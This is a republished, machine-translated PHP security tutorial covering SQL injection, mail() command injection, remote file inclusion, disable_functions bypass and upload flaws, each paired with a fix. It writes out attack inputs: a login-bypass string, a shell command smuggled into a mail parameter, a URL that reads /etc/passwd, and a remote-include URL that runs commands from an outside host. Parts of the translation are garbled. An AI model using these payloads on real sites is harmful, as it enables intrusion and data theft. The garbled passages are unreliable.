Home > Article > Backend Development > PHP security dog tail continued mink_PHP tutorial
PHP security dog tail continued mink_PHP tutorial
- WBOYOriginal
- 2016-07-15 13:22:56891browse
Shaun Clowes's article Exploiting Common Vulnerabilities in PHP Applications is indeed very well written.
It takes into account many aspects. This article of mine is just a continuation of the article and adds some other issues that have not been mentioned much. This article focuses on solving the problem, not
attacking it.
1. Ancient deceptive SQL statements
In default mode, even if you forget to copy php.ini to /usr/local/lib/php.ini, php still turns magic_quotes_gpc=on.
In this way, single quotes ('), double quotes ("), backslash() and null characters NUL
(the null byte) of all variables from GET/POST/Cookie will be added Backslash, so that the database can be queried correctly.
However, a configuration file php.ini-optimized was introduced in php-4-RC2, and this optimized php.ini is
magic_quotes_gpc=off. Some network administrators may copy php.ini-optimized to
/usr/local/lib/php.ini when they see the word "optimized", which is more dangerous at this time. Like a relatively simple verification, it is assumed that the necessary characters are not filtered. :
select * from login where user='$HTTP_POST_VARS[user]' and pass='$HTTP_POST_VARS[pass]'
We can enter 1' or 1='1 in the user box and password box to pass the verification Yes. This is a very antique method. This statement will be replaced by:
select * from login where user='1' or 1='1' and pass='1' or 1='1 '
Because or 1='1' is true, so it passes.
The best solution is to filter all unnecessary characters, and it is recommended to use it in SQL from GET/POST/Cookie. Add a custom function to the variable in
:
function gpc2sql($str) {
if(get_magic_quotes_gpc()==1)
return $str;
else
return addslashes($str);
}
Mainly so that your program can be safely transplanted into various systems.
2. The fifth parameter of the mail function
is in php-4.0.5. At that time, the mail function introduced a fifth parameter to set additional command line parameters when actually sending the email.
However, the special SHELL command characters were not well checked, so there was a big problem in executing the command. Like the example in the manual:
mail("nobody@aol.com", "the subject", $message, "From: webmaster@$SERVER_NAME", "-fwebmaster@$SERVERNAME");
This is If there is a problem, if $SERVER_NAME=;mail san@xfocus.org to my mailbox. As a reminder, there are several examples in the PHP manual that have security issues. Please do not copy them when you actually use them. They only demonstrate the
basic functions of the function. Just understand them.
For this problem of the mail function, the simplest way is not to use the fifth parameter. If you want to use it, just filter illegal characters such as (;), and modify the program ext/standard/ of the
php source code package. mail.c, add the following line before if (extra_cmd != NULL) {:
extra_cmd=NULL
and then recompile.
3. UNIX version's require and include functions
The win version's require and include functions do not support HTTP and FTP remote file inclusion, while the UNIX version supports remote inclusion of files by default.
require and include will be executed as part of the program regardless of your extension.
When we write a program, in order to modularize the program and make the program portable, we inevitably use a lot of require or include functions.
And sometimes variables are used as parameters, such as: include("$something "); If the user can control the $something parameter at this time, and this
parameter is not filtered, it will be a disaster.
First, you can view files that any web user has read permissions for. Assume that the program is called http://victim/test.php, so we can use the following
url: http://victim/test.php? something=/etc/passwd See the /etc/passwd file.
In addition, you can use the functions contained in its remote files to execute commands. For example, if I create a file test.php under www.xfocus.org, the content is:
, then I can use the following url: http://victim/test.php?something= http://www.xfocus.org/test.php?cmd=uname This method runs any
command.
This problem also occurs with phpMyAdmin, we can use it to see any file we want to see. However, before include, it first uses the file_exist
function to determine whether the file exists, and this file_exist does not support remote files, so the second method above cannot be used directly. But we
can use the log function of apache to request a URL with php code. In this way, something designated as apache's log can also execute the command
, but apache's log is usually relatively large and has too much clutter. information. The method mentioned in
http://www.securereality.com.au/sradv00008.txt is more clever. Use file upload to upload the local
script to execute the command, which will be in the server's file upload temporary directory. A file name such as php8Ta02I is generated. Since the file exists
at this time, the execution script in the uploaded file can be executed through the file_exist function.
So you must be careful when using include and require functions, especially if the included files are specified with parameters. The parameters must not
be controlled by the user. There is also the ability to remove remote file inclusion by modifying the php.ini file.This was used before php-4.0.3 using
disable-url-fopen-wrapper and in later versions, use allow_url_fopen = off to turn it off.
4. disable_function
In php-4.0.1, a function disable_functions was introduced in php.ini. This function is more useful and can be used to disable some functions.
For example, if you add disable_functions = passthru exec system popen in php.ini, then when executing these functions
it will only prompt Warning: system() has been disabled for security reasons.
Oh, but it’s not nothing. There is a way to execute system commands. Because PHP uses many perl features, for example, you can also use (`) to execute commands:
$output = `ls -al`;
echo "
$output";
?>
This can only be avoided by setting it to safe_mode, but the abominable safe_mode is too restrictive, and it is also a bit hampered in doing other things.
5. file upload
The problem of PHP file upload has been clearly described in the article http://www.securereality.com.au/sradv00001.html.
This is indeed a serious problem. , generally the files we want to upload will also be placed in the web directory, so it is easy for attackers to obtain files that can be read by some web users of the system
.
Fortunately, the is_uploaded_file and move_uploaded_file functions are provided after php-4.0.3. Therefore, programs that upload files
above php-4.0.3 must no longer use the copy function. Use move_uploaded_file instead, which will check whether it is an uploaded file. If it is php-4.0.2
and below, it is recommended to add a function before copy:
function is_uploaded_file($filename) {
if (!$tmp_file = get_cfg_var('upload_tmp_dir')) {
$tmp_file = dirname(tempnam('', ''));
}
$tmp_file.='/'.basename($filename);
/* User might have trailing slash in php .ini... */
return (ereg_replace('/+', '/', $tmp_file) == $filename);
}
This vulnerability has been in the security spotlight for a long time. There are many verification and judgment statements before copying, so it is quite difficult to attack it, hehe.
Also, never use environment variables, cookie variables, session variables, etc. as conditions for determining life and death, because these variables are too easy to be forged.
Haha, I have a lot to do at hand. I will add the others as I think of them. Other comrades are also welcome to add and modify them at will.
References
1. PHP 4 ChangeLog (http://www.php.net/ChangeLog-4.php)
2. A Study In Scarlet - Exploiting Common Vulnerabilities in PHP Applications
( http://www.securereality.com.au/studyinscarlet.txt) and translation of analysist.
3. Remote command execution vulnerabilities in phpMyAdmin and phpPgAdmin
(http://www.securereality.com.au/sradv00008.txt)